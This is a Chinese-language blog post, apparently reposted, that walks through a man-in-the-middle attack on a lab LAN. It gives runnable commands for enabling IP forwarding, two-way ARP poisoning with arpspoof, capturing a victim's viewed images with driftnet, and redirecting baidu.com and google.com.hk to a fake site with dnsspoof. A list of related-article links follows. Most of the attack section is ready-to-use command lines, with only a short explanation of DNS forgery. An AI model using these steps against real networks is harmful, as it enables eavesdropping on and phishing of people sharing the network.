arpspoof dnsspoof中间人攻击
最近搞了一个监听神器,尽管使用了网卡混杂模式,不过监听到的几乎全是本地流量, 为了获取更多有用的数据,搞一下中间人攻击,最基本的就是arpspoof + IP转发,这样就可以获得局域网内任何人的上网流量, 难得的是实验室没有做ARP防护,给arpspoof一个大行其道的机会。
arpspoof
实战环境
攻击者(kali linux):10.10.10.1
- 攻击目标:10.10.10.2
默认网关:10.10.10.254
攻击步骤
首先在本地开启IP转发,否则很容易被发觉。
echo 1 >> /proc/sys/net/ipv4/ip_forward
用man arpspoof查看参数详细说明
首先跟10.10.10.2说我是网关10.10.10.254
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
然后跟网关10.10.10.254说我是10.10.10.2,完成双向欺骗
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2
上面两条arpspoof指令可以用下面一个指令完成
arpspoof -i eth0 -t 10.10.10.2 -r 10.10.10.254
最后利用driftnet工具捕获并友好地显示10.10.10.2在网上浏览的图片
driftnet -i eth0
REF
dnsspoof
攻击环境
攻击者(kali linux):10.10.10.1
- 攻击目标:10.10.10.2
- 默认网关:10.10.10.254
- DNS服务器: 8.8.8.8
伪造网站: 10.10.10.3
攻击步骤
先进行arp欺骗,以中转攻击目标的所有上网流量
echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2
按照hosts文件格式,创建一个dnsspoof.hosts文件, 当受害者请求该文件中的域名解析时,我们就返回给他一个伪造的IP地址,让其访问我们伪造的网站。
cat dnsspoof.hosts
10.10.10.3 .baidu.com
10.10.10.3 .google.com.hk
执行dnsspoof, -f指定hosts文件,host 10.10.10.2 and udp port 53 遵从tcpdump流量过滤规则
dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53
这样当攻击目标10.10.10.2访问baidu.com或者google.com.hk时,受害者访问的实际上是10.10.10.3指定的网站。
通过抓包分析,dnsspoof的原理如下
由于DNS协议使用是传输层协议是UDP协议, 这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP. 10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少? 10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3。
转载于:https://www.cnblogs.com/reddusty/p/4826660.html
arpspoof dnsspoof中间人攻击相关推荐
- [web安全]使用ARPspoof进行中间人(MiTM)攻击
上次发现的arpspoof,这次来研究了,记录了点东西,方便以后查阅. 中间人攻击: 坏人将自己置于服务器和客户端之间,从而可以访问呢两者之间的所有流量,方便窃听等干坏事. ARPspoof: ARP ...
- 中间人攻击(ARPspoof)
中间人攻击(ARPspoof) 1.介绍: 中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击 ...
- SSH V2的中间人攻击
SSH V2的中间人攻击 2012-12-19 10:48:52 我来说两句 作者:Dis9Team 收藏 我要投稿 中间人攻击(Man-in-the-MiddleAttac ...
- SSL/TLS中间人攻击
准备:kali.xp kali ip:192.168.14.157 目标ip:192.168.14.158 目标网关:192.168.14.2 使用工具:ettercap.sslstrip.arpsp ...
- Kali Linux Web 渗透测试秘籍 第八章 中间人攻击
第八章 中间人攻击 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 中间人(MITM)攻击是一种攻击类型,其中攻击者将它自己放到两方之 ...
- android客户端中间人攻击,Android 中间人攻击
0x00 Android中间人攻击的思路就是劫持局域网中被攻击机器和服务器间的对话.被攻击机器和服务器表面上工作正常,实际上已经被中间人劫持.可以从一张图来明白这个过程. 受攻击主机发送的数据,首先经 ...
- 网络嗅探与欺骗----函数sniff()、ARP的原理、ARP欺骗、AARP欺骗的中间人攻击
网络嗅探与欺骗 如果想要彻底了解一个网络,那么最好的办法就是对网络中的流量进行嗅探 嗅探工具可以用来窃取网络中明文传输的密码,监视网络中的数据流向,甚至可以收集远程登录所使用的NTLM数据包(这个数据 ...
- SSH协议弱加密算法漏洞的利用及复现(中间人攻击)
SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...
- HTTPS中间人攻击实验
HTTPS中间人攻击实验 一.实验基础 1.HTTPS概述 HTTPS (全称: Hyper Text Transfer Protocol over SecureSocketLayer), 是以安全为 ...
最新文章
- “惊群”,看看nginx是怎么解决它的
- mysql怎么执行任务_Mysql怎么定时执行任务
- 2.API的调用过程(3环进0环)
- Gentoo 安装日记 01 (工具准备)
- OpenCV放大图像:多输出
- 洛谷 - P4556 [Vani有约会]雨天的尾巴 /【模板】线段树合并(树上差分+线段树合并)
- MySQL无法重启问题解决Warning: World-writable config file '/etc/my.cnf' is ignored
- PDF转换技巧之如何把文件转换为WPS?
- c语言 单片机模拟,【51单片机】普通I/O口模拟SPI口C语言程序
- oracle批量更新之使用游标进行分批次更新的5种方式及速度比对
- 【USACO 4.3.2】质数方阵
- python re包_使用Python中的re包将句子分成子句
- 怎样将树的中序遍历的数输入到一个数组中_二叉搜索树的后序遍历序列(剑指offer第三十一天)...
- python之web编程
- java 缓存 框架_5个常用的Java分布式缓存框架
- 正负数据如何归一化_数据标准化period;归一化处理
- 怎么理解幂等性[或者http幂等性]
- 用vmware安装雨林木风虚拟机系统的坑
- FLOPS、TOPS和FLOPs的区别
- 关于苹果支付ApplePay的一些个人总结
热门文章
- vijos 新年趣事之打牌
- http://www.cocoachina.com/ios/20150907/13339.html
- 科大讯飞语音识别C++版本SDK集成测试的一些问题,工具VS+QT
- C语言:将邻接表转换成邻接矩阵算法
- 计算机怎样在表格中画正字,excel表格里怎样做艺术字-Excel艺术字怎么在文字下面...
- 《Android 应用案例开发大全(第二版)》——2.2节壁纸策划及准备工作
- javaScript实现倒计时功能
- Solidity 中 transfer、send、call的区别
- TIFF图像文件(一):文件结构
- 开机广告,智能电视的二次战争